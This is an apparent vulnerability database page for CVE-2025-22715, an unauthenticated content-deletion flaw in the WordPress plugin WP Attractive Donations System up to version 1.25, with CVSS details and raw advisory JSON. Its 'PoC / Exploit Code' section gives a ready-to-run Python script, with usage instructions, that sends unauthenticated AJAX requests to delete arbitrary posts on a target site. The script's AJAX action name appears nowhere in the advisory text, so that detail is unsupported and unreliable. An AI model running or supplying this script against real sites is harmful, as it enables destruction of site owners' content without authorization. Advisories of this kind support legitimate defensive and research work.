Security Vulnerability Report
中文
CVE-2025-22715 CVSS 7.5 HIGH

CVE-2025-22715

Published: 2026-01-08 10:15:48
Last Modified: 2026-04-27 19:16:12

Description

Missing Authorization vulnerability in loopus WP Attractive Donations System - Easy Stripe & Paypal donations WP_AttractiveDonationsSystem allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Attractive Donations System - Easy Stripe & Paypal donations: from n/a through <= 1.25.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

WP Attractive Donations System <= 1.25

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-22715 PoC - Missing Authorization in WP Attractive Donations System # Target: WordPress site with WP_AttractiveDonationsSystem plugin <= 1.25 def exploit_deletion(target_url, post_id): """ Exploit the missing authorization vulnerability to delete arbitrary posts """ # Step 1: Identify the vulnerable AJAX endpoint ajax_endpoint = target_url.rstrip('/') + '/wp-admin/admin-ajax.php' # Step 2: Prepare the exploitation request # The plugin's admin handler lacks proper capability checks payload = { 'action': 'wp_attractive_delete_content', # Vulnerable action 'post_id': post_id, # Target post ID to delete } # Step 3: Send the malicious request without authentication headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-22715-PoC)' } try: response = requests.post(ajax_endpoint, data=payload, headers=headers, timeout=10) if response.status_code == 200: print(f'[+] Request sent successfully to delete post ID: {post_id}') print(f'[+] Response: {response.text[:200]}') return True else: print(f'[-] Request failed with status: {response.status_code}') return False except requests.exceptions.RequestException as e: print(f'[-] Connection error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 3: print('Usage: python cve-2025-22715_poc.py <target_url> <post_id>') print('Example: python cve-2025-22715_poc.py http://example.com 123') sys.exit(1) target = sys.argv[1] post_id = sys.argv[2] exploit_deletion(target, post_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-22715", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:47.990", "lastModified": "2026-04-27T19:16:12.123", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in loopus WP Attractive Donations System - Easy Stripe & Paypal donations WP_AttractiveDonationsSystem allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Attractive Donations System - Easy Stripe & Paypal donations: from n/a through <= 1.25."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/WP_AttractiveDonationsSystem/vulnerability/wordpress-wp-attractive-donations-system-easy-stripe-paypal-donations-plugin-1-25-arbitrary-content-deletion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}